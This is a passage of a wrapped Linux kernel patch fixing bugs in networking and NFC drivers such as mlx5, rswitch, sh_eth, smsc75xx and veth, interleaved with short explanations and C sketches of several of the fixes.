+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib.c b/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib.c
+index 911cf4d239645..4285b31fee6c4 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib.c
+@@ -70,7 +70,6 @@ static void mlx5i_build_nic_params(struct mlx5_core_dev *mdev,
+ 
+ 	params->packet_merge.type = MLX5E_PACKET_MERGE_NONE;
+ 	params->hard_mtu = MLX5_IB_GRH_BYTES + MLX5_IPOIB_HARD_LEN;
+-	params->tunneled_offload_en = false;
+ 
+ 	/* CQE compression is not supported for IPoIB */
+ 	params->rx_cqe_compress_def = false;
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/main.c b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+index 4e1b5757528a0..f4e0431da55b4 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+@@ -1346,8 +1346,8 @@ static void mlx5_unload(struct mlx5_core_dev *dev)
+ {
+ 	mlx5_devlink_traps_unregister(priv_to_devlink(dev));
+ 	mlx5_sf_dev_table_destroy(dev);
+-	mlx5_sriov_detach(dev);
+ 	mlx5_eswitch_disable(dev->priv.eswitch);
++	mlx5_sriov_detach(dev);
+ 	mlx5_lag_remove_mdev(dev);
+ 	mlx5_ec_cleanup(dev);
+ 	mlx5_sf_hw_table_destroy(dev);
+@@ -1768,11 +1768,11 @@ static void remove_one(struct pci_dev *pdev)
+ 	struct mlx5_core_dev *dev  = pci_get_drvdata(pdev);
+ 	struct devlink *devlink = priv_to_devlink(dev);
+ 
++	set_bit(MLX5_BREAK_FW_WAIT, &dev->intf_state);
+ 	/* mlx5_drain_fw_reset() is using devlink APIs. Hence, we must drain
+ 	 * fw_reset before unregistering the devlink.
+ 	 */
+ 	mlx5_drain_fw_reset(dev);
+-	set_bit(MLX5_BREAK_FW_WAIT, &dev->intf_state);
+ 	devlink_unregister(devlink);
+ 	mlx5_sriov_disable(pdev);
+ 	mlx5_crdump_disable(dev);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/pagealloc.c b/drivers/net/ethernet/mellanox/mlx5/core/pagealloc.c
+index 64d4e7125e9bb..95dc67fb30015 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/pagealloc.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/pagealloc.c
+@@ -82,6 +82,16 @@ static u16 func_id_to_type(struct mlx5_core_dev *dev, u16 func_id, bool ec_funct
+ 	return func_id <= mlx5_core_max_vfs(dev) ?  MLX5_VF : MLX5_SF;
+ }
+ 
++static u32 mlx5_get_ec_function(u32 function)
++{
++	return function >> 16;
++}
++
++static u32 mlx5_get_func_id(u32 function)
++{
++	return function & 0xffff;
++}
++
+ static struct rb_root *page_root_per_function(struct mlx5_core_dev *dev, u32 function)
+ {
+ 	struct rb_root *root;
+@@ -665,20 +675,22 @@ static int optimal_reclaimed_pages(void)
+ }
+ 
+ static int mlx5_reclaim_root_pages(struct mlx5_core_dev *dev,
+-				   struct rb_root *root, u16 func_id)
++				   struct rb_root *root, u32 function)
+ {
+ 	u64 recl_pages_to_jiffies = msecs_to_jiffies(mlx5_tout_ms(dev, RECLAIM_PAGES));
+ 	unsigned long end = jiffies + recl_pages_to_jiffies;
+ 
+ 	while (!RB_EMPTY_ROOT(root)) {
++		u32 ec_function = mlx5_get_ec_function(function);
++		u32 function_id = mlx5_get_func_id(function);
+ 		int nclaimed;
+ 		int err;
+ 
+-		err = reclaim_pages(dev, func_id, optimal_reclaimed_pages(),
+-				    &nclaimed, false, mlx5_core_is_ecpf(dev));
++		err = reclaim_pages(dev, function_id, optimal_reclaimed_pages(),
++				    &nclaimed, false, ec_function);
+ 		if (err) {
+-			mlx5_core_warn(dev, "failed reclaiming pages (%d) for func id 0x%x\n",
+-				       err, func_id);
++			mlx5_core_warn(dev, "reclaim_pages err (%d) func_id=0x%x ec_func=0x%x\n",
++				       err, function_id, ec_function);
+ 			return err;
+ 		}
+ 
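
The two helpers introduced above imply that callers of mlx5_reclaim_root_pages() now pass a packed u32: ec_function in the upper 16 bits, function id in the lower 16. A self-contained sketch of that encoding (the packing helper is a hypothetical caller-side counterpart; only the unpacking mirrors the patch):

#include <assert.h>
#include <stdint.h>

static uint32_t pack_function(uint16_t ec_function, uint16_t func_id)
{
	return ((uint32_t)ec_function << 16) | func_id;	/* assumed caller side */
}

int main(void)
{
	uint32_t function = pack_function(1, 0x2a);

	assert((function >> 16) == 1);		/* mlx5_get_ec_function() */
	assert((function & 0xffff) == 0x2a);	/* mlx5_get_func_id() */
	return 0;
}
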
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/spectrum.c b/drivers/net/ethernet/mellanox/mlxsw/spectrum.c
+index f5b2d965d476d..12540feb45088 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/spectrum.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/spectrum.c
+@@ -2937,6 +2937,7 @@ static int mlxsw_sp_netdevice_event(struct notifier_block *unused,
+ 
+ static void mlxsw_sp_parsing_init(struct mlxsw_sp *mlxsw_sp)
+ {
++	refcount_set(&mlxsw_sp->parsing.parsing_depth_ref, 0);
+ 	mlxsw_sp->parsing.parsing_depth = MLXSW_SP_DEFAULT_PARSING_DEPTH;
+ 	mlxsw_sp->parsing.vxlan_udp_dport = MLXSW_SP_DEFAULT_VXLAN_UDP_DPORT;
+ 	mutex_init(&mlxsw_sp->parsing.lock);
+@@ -2945,6 +2946,7 @@ static void mlxsw_sp_parsing_init(struct mlxsw_sp *mlxsw_sp)
+ static void mlxsw_sp_parsing_fini(struct mlxsw_sp *mlxsw_sp)
+ {
+ 	mutex_destroy(&mlxsw_sp->parsing.lock);
++	WARN_ON_ONCE(refcount_read(&mlxsw_sp->parsing.parsing_depth_ref));
+ }
+ 
+ struct mlxsw_sp_ipv6_addr_node {
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c b/drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c
+index 09e32778b012d..4a73e2fe95ef9 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c
+@@ -10381,11 +10381,23 @@ err_reg_write:
+ 					      old_inc_parsing_depth);
+ 	return err;
+ }
++
++static void mlxsw_sp_mp_hash_fini(struct mlxsw_sp *mlxsw_sp)
++{
++	bool old_inc_parsing_depth = mlxsw_sp->router->inc_parsing_depth;
++
++	mlxsw_sp_mp_hash_parsing_depth_adjust(mlxsw_sp, old_inc_parsing_depth,
++					      false);
++}
+ #else
+ static int mlxsw_sp_mp_hash_init(struct mlxsw_sp *mlxsw_sp)
+ {
+ 	return 0;
+ }
++
++static void mlxsw_sp_mp_hash_fini(struct mlxsw_sp *mlxsw_sp)
++{
++}
+ #endif
+ 
+ static int mlxsw_sp_dscp_init(struct mlxsw_sp *mlxsw_sp)
+@@ -10615,6 +10627,7 @@ err_register_inet6addr_notifier:
+ err_register_inetaddr_notifier:
+ 	mlxsw_core_flush_owq();
+ err_dscp_init:
++	mlxsw_sp_mp_hash_fini(mlxsw_sp);
+ err_mp_hash_init:
+ 	mlxsw_sp_neigh_fini(mlxsw_sp);
+ err_neigh_init:
+@@ -10655,6 +10668,7 @@ void mlxsw_sp_router_fini(struct mlxsw_sp *mlxsw_sp)
+ 	unregister_inet6addr_notifier(&mlxsw_sp->router->inet6addr_nb);
+ 	unregister_inetaddr_notifier(&mlxsw_sp->router->inetaddr_nb);
+ 	mlxsw_core_flush_owq();
++	mlxsw_sp_mp_hash_fini(mlxsw_sp);
+ 	mlxsw_sp_neigh_fini(mlxsw_sp);
+ 	mlxsw_sp_lb_rif_fini(mlxsw_sp);
+ 	mlxsw_sp_vrs_fini(mlxsw_sp);
+diff --git a/drivers/net/ethernet/qlogic/qed/qed_dev.c b/drivers/net/ethernet/qlogic/qed/qed_dev.c
+index d61cd32ec3b65..86a93cac26470 100644
+--- a/drivers/net/ethernet/qlogic/qed/qed_dev.c
++++ b/drivers/net/ethernet/qlogic/qed/qed_dev.c
+@@ -5083,6 +5083,11 @@ static int qed_init_wfq_param(struct qed_hwfn *p_hwfn,
+ 
+ 	num_vports = p_hwfn->qm_info.num_vports;
+ 
++	if (num_vports < 2) {
++		DP_NOTICE(p_hwfn, "Unexpected num_vports: %d\n", num_vports);
++		return -EINVAL;
++	}
++
+ 	/* Accounting for the vports which are configured for WFQ explicitly */
+ 	for (i = 0; i < num_vports; i++) {
+ 		u32 tmp_speed;
+diff --git a/drivers/net/ethernet/qlogic/qed/qed_mng_tlv.c b/drivers/net/ethernet/qlogic/qed/qed_mng_tlv.c
+index 6190adf965bca..f55eed092f25d 100644
+--- a/drivers/net/ethernet/qlogic/qed/qed_mng_tlv.c
++++ b/drivers/net/ethernet/qlogic/qed/qed_mng_tlv.c
+@@ -422,7 +422,7 @@ qed_mfw_get_tlv_time_value(struct qed_mfw_tlv_time *p_time,
+ 	if (p_time->hour > 23)
+ 		p_time->hour = 0;
+ 	if (p_time->min > 59)
+-		p_time->hour = 0;
++		p_time->min = 0;
+ 	if (p_time->msec > 999)
+ 		p_time->msec = 0;
+ 	if (p_time->usec > 999)
+diff --git a/drivers/net/ethernet/renesas/ravb_main.c b/drivers/net/ethernet/renesas/ravb_main.c
+index 0f54849a38235..894e2690c6437 100644
+--- a/drivers/net/ethernet/renesas/ravb_main.c
++++ b/drivers/net/ethernet/renesas/ravb_main.c
+@@ -1455,8 +1455,6 @@ static int ravb_phy_init(struct net_device *ndev)
+ 		phy_remove_link_mode(phydev, ETHTOOL_LINK_MODE_100baseT_Half_BIT);
+ 	}
+ 
+-	/* Indicate that the MAC is responsible for managing PHY PM */
+-	phydev->mac_managed_pm = true;
+ 	phy_attached_info(phydev);
+ 
+ 	return 0;
+@@ -2379,6 +2377,8 @@ static int ravb_mdio_init(struct ravb_private *priv)
+ {
+ 	struct platform_device *pdev = priv->pdev;
+ 	struct device *dev = &pdev->dev;
++	struct phy_device *phydev;
++	struct device_node *pn;
+ 	int error;
+ 
+ 	/* Bitbang init */
+@@ -2400,6 +2400,14 @@ static int ravb_mdio_init(struct ravb_private *priv)
+ 	if (error)
+ 		goto out_free_bus;
+ 
++	pn = of_parse_phandle(dev->of_node, "phy-handle", 0);
++	phydev = of_phy_find_device(pn);
++	if (phydev) {
++		phydev->mac_managed_pm = true;
++		put_device(&phydev->mdio.dev);
++	}
++	of_node_put(pn);
++
+ 	return 0;
+ 
+ out_free_bus:
+diff --git a/drivers/net/ethernet/renesas/rswitch.c b/drivers/net/ethernet/renesas/rswitch.c
+index 2370c7797a0aa..5118117a17eef 100644
+--- a/drivers/net/ethernet/renesas/rswitch.c
++++ b/drivers/net/ethernet/renesas/rswitch.c
+@@ -241,7 +241,7 @@ static int rswitch_get_num_cur_queues(struct rswitch_gwca_queue *gq)
+ 
+ static bool rswitch_is_queue_rxed(struct rswitch_gwca_queue *gq)
+ {
+-	struct rswitch_ext_ts_desc *desc = &gq->ts_ring[gq->dirty];
++	struct rswitch_ext_ts_desc *desc = &gq->rx_ring[gq->dirty];
+ 
+ 	if ((desc->desc.die_dt & DT_MASK) != DT_FEMPTY)
+ 		return true;
+@@ -284,13 +284,13 @@ static void rswitch_gwca_queue_free(struct net_device *ndev,
+ 	if (gq->gptp) {
+ 		dma_free_coherent(ndev->dev.parent,
+ 				  sizeof(struct rswitch_ext_ts_desc) *
+-				  (gq->ring_size + 1), gq->ts_ring, gq->ring_dma);
+-		gq->ts_ring = NULL;
++				  (gq->ring_size + 1), gq->rx_ring, gq->ring_dma);
++		gq->rx_ring = NULL;
+ 	} else {
+ 		dma_free_coherent(ndev->dev.parent,
+ 				  sizeof(struct rswitch_ext_desc) *
+-				  (gq->ring_size + 1), gq->ring, gq->ring_dma);
+-		gq->ring = NULL;
++				  (gq->ring_size + 1), gq->tx_ring, gq->ring_dma);
++		gq->tx_ring = NULL;
+ 	}
+ 
+ 	if (!gq->dir_tx) {
+@@ -322,14 +322,14 @@ static int rswitch_gwca_queue_alloc(struct net_device *ndev,
+ 		rswitch_gwca_queue_alloc_skb(gq, 0, gq->ring_size);
+ 
+ 	if (gptp)
+-		gq->ts_ring = dma_alloc_coherent(ndev->dev.parent,
++		gq->rx_ring = dma_alloc_coherent(ndev->dev.parent,
+ 						 sizeof(struct rswitch_ext_ts_desc) *
+ 						 (gq->ring_size + 1), &gq->ring_dma, GFP_KERNEL);
+ 	else
+-		gq->ring = dma_alloc_coherent(ndev->dev.parent,
+-					      sizeof(struct rswitch_ext_desc) *
+-					      (gq->ring_size + 1), &gq->ring_dma, GFP_KERNEL);
+-	if (!gq->ts_ring && !gq->ring)
++		gq->tx_ring = dma_alloc_coherent(ndev->dev.parent,
++						 sizeof(struct rswitch_ext_desc) *
++						 (gq->ring_size + 1), &gq->ring_dma, GFP_KERNEL);
++	if (!gq->rx_ring && !gq->tx_ring)
+ 		goto out;
+ 
+ 	i = gq->index / 32;
+@@ -362,14 +362,14 @@ static int rswitch_gwca_queue_format(struct net_device *ndev,
+ 				     struct rswitch_private *priv,
+ 				     struct rswitch_gwca_queue *gq)
+ {
+-	int tx_ring_size = sizeof(struct rswitch_ext_desc) * gq->ring_size;
++	int ring_size = sizeof(struct rswitch_ext_desc) * gq->ring_size;
+ 	struct rswitch_ext_desc *desc;
+ 	struct rswitch_desc *linkfix;
+ 	dma_addr_t dma_addr;
+ 	int i;
+ 
+-	memset(gq->ring, 0, tx_ring_size);
+-	for (i = 0, desc = gq->ring; i < gq->ring_size; i++, desc++) {
++	memset(gq->tx_ring, 0, ring_size);
++	for (i = 0, desc = gq->tx_ring; i < gq->ring_size; i++, desc++) {
+ 		if (!gq->dir_tx) {
+ 			dma_addr = dma_map_single(ndev->dev.parent,
+ 						  gq->skbs[i]->data, PKT_BUF_SZ,
+@@ -398,7 +398,7 @@ static int rswitch_gwca_queue_format(struct net_device *ndev,
+ 
+ err:
+ 	if (!gq->dir_tx) {
+-		for (i--, desc = gq->ring; i >= 0; i--, desc++) {
++		for (i--, desc = gq->tx_ring; i >= 0; i--, desc++) {
+ 			dma_addr = rswitch_desc_get_dptr(&desc->desc);
+ 			dma_unmap_single(ndev->dev.parent, dma_addr, PKT_BUF_SZ,
+ 					 DMA_FROM_DEVICE);
+@@ -408,9 +408,9 @@ err:
+ 	return -ENOMEM;
+ }
+ 
+-static int rswitch_gwca_queue_ts_fill(struct net_device *ndev,
+-				      struct rswitch_gwca_queue *gq,
+-				      int start_index, int num)
++static int rswitch_gwca_queue_ext_ts_fill(struct net_device *ndev,
++					  struct rswitch_gwca_queue *gq,
++					  int start_index, int num)
+ {
+ 	struct rswitch_device *rdev = netdev_priv(ndev);
+ 	struct rswitch_ext_ts_desc *desc;
+@@ -419,7 +419,7 @@ static int rswitch_gwca_queue_ts_fill(struct net_device *ndev,
+ 
+ 	for (i = 0; i < num; i++) {
+ 		index = (i + start_index) % gq->ring_size;
+-		desc = &gq->ts_ring[index];
++		desc = &gq->rx_ring[index];
+ 		if (!gq->dir_tx) {
+ 			dma_addr = dma_map_single(ndev->dev.parent,
+ 						  gq->skbs[index]->data, PKT_BUF_SZ,
+@@ -443,7 +443,7 @@ err:
+ 	if (!gq->dir_tx) {
+ 		for (i--; i >= 0; i--) {
+ 			index = (i + start_index) % gq->ring_size;
+-			desc = &gq->ts_ring[index];
++			desc = &gq->rx_ring[index];
+ 			dma_addr = rswitch_desc_get_dptr(&desc->desc);
+ 			dma_unmap_single(ndev->dev.parent, dma_addr, PKT_BUF_SZ,
+ 					 DMA_FROM_DEVICE);
+@@ -453,21 +453,21 @@ err:
+ 	return -ENOMEM;
+ }
+ 
+-static int rswitch_gwca_queue_ts_format(struct net_device *ndev,
+-					struct rswitch_private *priv,
+-					struct rswitch_gwca_queue *gq)
++static int rswitch_gwca_queue_ext_ts_format(struct net_device *ndev,
++					    struct rswitch_private *priv,
++					    struct rswitch_gwca_queue *gq)
+ {
+-	int tx_ts_ring_size = sizeof(struct rswitch_ext_ts_desc) * gq->ring_size;
++	int ring_size = sizeof(struct rswitch_ext_ts_desc) * gq->ring_size;
+ 	struct rswitch_ext_ts_desc *desc;
+ 	struct rswitch_desc *linkfix;
+ 	int err;
+ 
+-	memset(gq->ts_ring, 0, tx_ts_ring_size);
+-	err = rswitch_gwca_queue_ts_fill(ndev, gq, 0, gq->ring_size);
++	memset(gq->rx_ring, 0, ring_size);
++	err = rswitch_gwca_queue_ext_ts_fill(ndev, gq, 0, gq->ring_size);
+ 	if (err < 0)
+ 		return err;
+ 
+-	desc = &gq->ts_ring[gq->ring_size];	/* Last */
++	desc = &gq->rx_ring[gq->ring_size];	/* Last */
+ 	rswitch_desc_set_dptr(&desc->desc, gq->ring_dma);
+ 	desc->desc.die_dt = DT_LINKFIX;
+ 
+@@ -595,7 +595,7 @@ static int rswitch_rxdmac_init(struct rswitch_private *priv, int index)
+ 	struct rswitch_device *rdev = priv->rdev[index];
+ 	struct net_device *ndev = rdev->ndev;
+ 
+-	return rswitch_gwca_queue_ts_format(ndev, priv, rdev->rx_queue);
++	return rswitch_gwca_queue_ext_ts_format(ndev, priv, rdev->rx_queue);
+ }
+ 
+ static int rswitch_gwca_hw_init(struct rswitch_private *priv)
+@@ -673,13 +673,14 @@ static bool rswitch_rx(struct net_device *ndev, int *quota)
+ 	u16 pkt_len;
+ 	u32 get_ts;
+ 
++	if (*quota <= 0)
++		return true;
++
+ 	boguscnt = min_t(int, gq->ring_size, *quota);
+ 	limit = boguscnt;
+ 
+-	desc = &gq->ts_ring[gq->cur];
++	desc = &gq->rx_ring[gq->cur];
+ 	while ((desc->desc.die_dt & DT_MASK) != DT_FEMPTY) {
+-		if (--boguscnt < 0)
+-			break;
+ 		dma_rmb();
+ 		pkt_len = le16_to_cpu(desc->desc.info_ds) & RX_DS;
+ 		skb = gq->skbs[gq->cur];
+@@ -704,19 +705,22 @@ static bool rswitch_rx(struct net_device *ndev, int *quota)
+ 		rdev->ndev->stats.rx_bytes += pkt_len;
+ 
+ 		gq->cur = rswitch_next_queue_index(gq, true, 1);
+-		desc = &gq->ts_ring[gq->cur];
++		desc = &gq->rx_ring[gq->cur];
++
++		if (--boguscnt <= 0)
++			break;
+ 	}
+ 
+ 	num = rswitch_get_num_cur_queues(gq);
+ 	ret = rswitch_gwca_queue_alloc_skb(gq, gq->dirty, num);
+ 	if (ret < 0)
+ 		goto err;
+-	ret = rswitch_gwca_queue_ts_fill(ndev, gq, gq->dirty, num);
++	ret = rswitch_gwca_queue_ext_ts_fill(ndev, gq, gq->dirty, num);
+ 	if (ret < 0)
+ 		goto err;
+ 	gq->dirty = rswitch_next_queue_index(gq, false, num);
+ 
+-	*quota -= limit - (++boguscnt);
++	*quota -= limit - boguscnt;
+ 
+ 	return boguscnt <= 0;
+ 
+@@ -738,7 +742,7 @@ static int rswitch_tx_free(struct net_device *ndev, bool free_txed_only)
+ 
+ 	for (; rswitch_get_num_cur_queues(gq) > 0;
+ 	     gq->dirty = rswitch_next_queue_index(gq, false, 1)) {
+-		desc = &gq->ring[gq->dirty];
++		desc = &gq->tx_ring[gq->dirty];
+ 		if (free_txed_only && (desc->desc.die_dt & DT_MASK) != DT_FEMPTY)
+ 			break;
+ 
+@@ -1416,7 +1420,7 @@ static netdev_tx_t rswitch_start_xmit(struct sk_buff *skb, struct net_device *nd
+ 	}
+ 
+ 	gq->skbs[gq->cur] = skb;
+-	desc = &gq->ring[gq->cur];
++	desc = &gq->tx_ring[gq->cur];
+ 	rswitch_desc_set_dptr(&desc->desc, dma_addr);
+ 	desc->desc.info_ds = cpu_to_le16(skb->len);
+ 
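
Beyond the tx_ring/rx_ring rename, the rswitch_rx() rework above changes when the budget counter is decremented: it now happens after a descriptor is handled, so "limit - boguscnt" is exactly the number processed and the old "++boguscnt" correction disappears. A toy model of that accounting (positive inputs assumed; nothing here is driver code):

#include <stdio.h>

static int rx_poll(int ready, int *quota)
{
	int boguscnt = ready < *quota ? ready : *quota;	/* min_t() */
	int limit = boguscnt;

	while (ready > 0) {
		ready--;			/* handle one descriptor */
		if (--boguscnt <= 0)
			break;
	}
	*quota -= limit - boguscnt;		/* descriptors consumed */
	return boguscnt <= 0;			/* true: budget exhausted */
}

int main(void)
{
	int quota = 4;

	printf("exhausted=%d quota_left=%d\n", rx_poll(10, &quota), quota);
	return 0;
}
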
+diff --git a/drivers/net/ethernet/renesas/rswitch.h b/drivers/net/ethernet/renesas/rswitch.h
+index 49efb0f31c77a..0584670abead5 100644
+--- a/drivers/net/ethernet/renesas/rswitch.h
++++ b/drivers/net/ethernet/renesas/rswitch.h
+@@ -915,8 +915,8 @@ struct rswitch_gwca_queue {
+ 	bool dir_tx;
+ 	bool gptp;
+ 	union {
+-		struct rswitch_ext_desc *ring;
+-		struct rswitch_ext_ts_desc *ts_ring;
++		struct rswitch_ext_desc *tx_ring;
++		struct rswitch_ext_ts_desc *rx_ring;
+ 	};
+ 	dma_addr_t ring_dma;
+ 	int ring_size;
+diff --git a/drivers/net/ethernet/renesas/sh_eth.c b/drivers/net/ethernet/renesas/sh_eth.c
+index 71a4991133080..14dc5833c465c 100644
+--- a/drivers/net/ethernet/renesas/sh_eth.c
++++ b/drivers/net/ethernet/renesas/sh_eth.c
+@@ -2029,8 +2029,6 @@ static int sh_eth_phy_init(struct net_device *ndev)
+ 	if (mdp->cd->register_type != SH_ETH_REG_GIGABIT)
+ 		phy_set_max_speed(phydev, SPEED_100);
+ 
+-	/* Indicate that the MAC is responsible for managing PHY PM */
+-	phydev->mac_managed_pm = true;
+ 	phy_attached_info(phydev);
+ 
+ 	return 0;
+@@ -3074,6 +3072,8 @@ static int sh_mdio_init(struct sh_eth_private *mdp,
+ 	struct bb_info *bitbang;
+ 	struct platform_device *pdev = mdp->pdev;
+ 	struct device *dev = &mdp->pdev->dev;
++	struct phy_device *phydev;
++	struct device_node *pn;
+ 
+ 	/* create bit control struct for PHY */
+ 	bitbang = devm_kzalloc(dev, sizeof(struct bb_info), GFP_KERNEL);
+@@ -3108,6 +3108,14 @@ static int sh_mdio_init(struct sh_eth_private *mdp,
+ 	if (ret)
+ 		goto out_free_bus;
+ 
++	pn = of_parse_phandle(dev->of_node, "phy-handle", 0);
++	phydev = of_phy_find_device(pn);
++	if (phydev) {
++		phydev->mac_managed_pm = true;
++		put_device(&phydev->mdio.dev);
++	}
++	of_node_put(pn);
++
+ 	return 0;
+ 
+ out_free_bus:
+diff --git a/drivers/net/ethernet/sun/ldmvsw.c b/drivers/net/ethernet/sun/ldmvsw.c
+index 8addee6d04bd8..734a817d3c945 100644
+--- a/drivers/net/ethernet/sun/ldmvsw.c
++++ b/drivers/net/ethernet/sun/ldmvsw.c
+@@ -287,6 +287,9 @@ static int vsw_port_probe(struct vio_dev *vdev, const struct vio_device_id *id)
+ 
+ 	hp = mdesc_grab();
+ 
++	if (!hp)
++		return -ENODEV;
++
+ 	rmac = mdesc_get_property(hp, vdev->mp, remote_macaddr_prop, &len);
+ 	err = -ENODEV;
+ 	if (!rmac) {
+diff --git a/drivers/net/ethernet/sun/sunvnet.c b/drivers/net/ethernet/sun/sunvnet.c
+index fe86fbd585861..e220620d0ffc9 100644
+--- a/drivers/net/ethernet/sun/sunvnet.c
++++ b/drivers/net/ethernet/sun/sunvnet.c
+@@ -433,6 +433,9 @@ static int vnet_port_probe(struct vio_dev *vdev, const struct vio_device_id *id)
+ 
+ 	hp = mdesc_grab();
+ 
++	if (!hp)
++		return -ENODEV;
++
+ 	vp = vnet_find_parent(hp, vdev->mp, vdev);
+ 	if (IS_ERR(vp)) {
+ 		pr_err("Cannot find port parent vnet\n");
+diff --git a/drivers/net/ipvlan/ipvlan_l3s.c b/drivers/net/ipvlan/ipvlan_l3s.c
+index 943d26cbf39f5..71712ea25403d 100644
+--- a/drivers/net/ipvlan/ipvlan_l3s.c
++++ b/drivers/net/ipvlan/ipvlan_l3s.c
+@@ -101,6 +101,7 @@ static unsigned int ipvlan_nf_input(void *priv, struct sk_buff *skb,
+ 		goto out;
+ 
+ 	skb->dev = addr->master->dev;
++	skb->skb_iif = skb->dev->ifindex;
+ 	len = skb->len + ETH_HLEN;
+ 	ipvlan_count_rx(addr->master, len, true, false);
+ out:
+diff --git a/drivers/net/phy/nxp-c45-tja11xx.c b/drivers/net/phy/nxp-c45-tja11xx.c
+index 047c581457e34..5813b07242ce1 100644
+--- a/drivers/net/phy/nxp-c45-tja11xx.c
++++ b/drivers/net/phy/nxp-c45-tja11xx.c
+@@ -79,7 +79,7 @@
+ #define SGMII_ABILITY			BIT(0)
+ 
+ #define VEND1_MII_BASIC_CONFIG		0xAFC6
+-#define MII_BASIC_CONFIG_REV		BIT(8)
++#define MII_BASIC_CONFIG_REV		BIT(4)
+ #define MII_BASIC_CONFIG_SGMII		0x9
+ #define MII_BASIC_CONFIG_RGMII		0x7
+ #define MII_BASIC_CONFIG_RMII		0x5
+diff --git a/drivers/net/phy/smsc.c b/drivers/net/phy/smsc.c
+index 00d9eff91dcfa..df2c5435c5c49 100644
+--- a/drivers/net/phy/smsc.c
++++ b/drivers/net/phy/smsc.c
+@@ -199,8 +199,11 @@ static int lan95xx_config_aneg_ext(struct phy_device *phydev)
+ static int lan87xx_read_status(struct phy_device *phydev)
+ {
+ 	struct smsc_phy_priv *priv = phydev->priv;
++	int err;
+ 
+-	int err = genphy_read_status(phydev);
++	err = genphy_read_status(phydev);
++	if (err)
++		return err;
+ 
+ 	if (!phydev->link && priv->energy_enable && phydev->irq == PHY_POLL) {
+ 		/* Disable EDPD to wake up PHY */
+diff --git a/drivers/net/usb/smsc75xx.c b/drivers/net/usb/smsc75xx.c
+index 95de452ff4dad..5d6454fedb3f1 100644
+--- a/drivers/net/usb/smsc75xx.c
++++ b/drivers/net/usb/smsc75xx.c
+@@ -2200,6 +2200,13 @@ static int smsc75xx_rx_fixup(struct usbnet *dev, struct sk_buff *skb)
+ 		size = (rx_cmd_a & RX_CMD_A_LEN) - RXW_PADDING;
+ 		align_count = (4 - ((size + RXW_PADDING) % 4)) % 4;
+ 
++		if (unlikely(size > skb->len)) {
++			netif_dbg(dev, rx_err, dev->net,
++				  "size err rx_cmd_a=0x%08x\n",
++				  rx_cmd_a);
++			return 0;
++		}
++
+ 		if (unlikely(rx_cmd_a & RX_CMD_A_RED)) {
+ 			netif_dbg(dev, rx_err, dev->net,
+ 				  "Error rx_cmd_a=0x%08x\n", rx_cmd_a);
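
The smsc75xx fixup above rejects frames whose device-reported length exceeds what is actually present in the buffer before anything is consumed. A hedged userspace sketch of that validation (the field mask and padding constants are assumptions for the demo, not read from the driver headers):

#include <stdint.h>
#include <stdio.h>

#define RX_CMD_A_LEN	0x00003fffU	/* assumed length mask */
#define RXW_PADDING	2		/* assumed padding */

static int rx_ok(uint32_t rx_cmd_a, size_t avail)
{
	size_t size = (rx_cmd_a & RX_CMD_A_LEN) - RXW_PADDING;

	if (size > avail) {
		fprintf(stderr, "size err rx_cmd_a=0x%08x\n", rx_cmd_a);
		return 0;			/* drop, as the fixup does */
	}
	return 1;
}

int main(void)
{
	printf("%d\n", rx_ok(100, 64));	/* 0: claims 98 bytes, only 64 present */
	return 0;
}
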
+diff --git a/drivers/net/veth.c b/drivers/net/veth.c
+index dfc7d87fad59f..30ae6695f8643 100644
+--- a/drivers/net/veth.c
++++ b/drivers/net/veth.c
+@@ -701,7 +701,8 @@ static int veth_convert_skb_to_xdp_buff(struct veth_rq *rq,
+ 	u32 frame_sz;
+ 
+ 	if (skb_shared(skb) || skb_head_is_locked(skb) ||
+-	    skb_shinfo(skb)->nr_frags) {
++	    skb_shinfo(skb)->nr_frags ||
++	    skb_headroom(skb) < XDP_PACKET_HEADROOM) {
+ 		u32 size, len, max_head_size, off;
+ 		struct sk_buff *nskb;
+ 		struct page *page;
+@@ -766,9 +767,6 @@ static int veth_convert_skb_to_xdp_buff(struct veth_rq *rq,
+ 
+ 		consume_skb(skb);
+ 		skb = nskb;
+-	} else if (skb_headroom(skb) < XDP_PACKET_HEADROOM &&
+-		   pskb_expand_head(skb, VETH_XDP_HEADROOM, 0, GFP_ATOMIC)) {
+-		goto drop;
+ 	}
+ 
+ 	/* SKB "head" area always has tailroom for skb_shared_info */
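
The veth change above stops patching up short headroom with pskb_expand_head() and instead routes any skb lacking XDP_PACKET_HEADROOM through the same copy-and-rebuild path used for shared or fragged skbs. The predicate, reduced to a checkable toy:

#include <stdio.h>

#define XDP_PACKET_HEADROOM	256	/* the kernel's value for native XDP */

static int needs_rebuild(int shared, int nr_frags, int headroom)
{
	return shared || nr_frags || headroom < XDP_PACKET_HEADROOM;
}

int main(void)
{
	printf("%d %d\n",
	       needs_rebuild(0, 0, 64),		/* 1: too little headroom */
	       needs_rebuild(0, 0, 512));	/* 0: usable as-is */
	return 0;
}
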
+diff --git a/drivers/nfc/pn533/usb.c b/drivers/nfc/pn533/usb.c
+index ed9c5e2cf3ad4..a187f0e0b0f7d 100644
+--- a/drivers/nfc/pn533/usb.c
++++ b/drivers/nfc/pn533/usb.c
+@@ -175,6 +175,7 @@ static int pn533_usb_send_frame(struct pn533 *dev,
+ 	print_hex_dump_debug("PN533 TX: ", DUMP_PREFIX_NONE, 16, 1,
+ 			     out->data, out->len, false);
+ 
++	arg.phy = phy;
+ 	init_completion(&arg.done);
+ 	cntx = phy->out_urb->context;
+ 	phy->out_urb->context = &arg;
+diff --git a/drivers/nfc/st-nci/ndlc.c b/drivers/nfc/st-nci/ndlc.c
+index 755460a73c0dc..d2aa9f766738e 100644
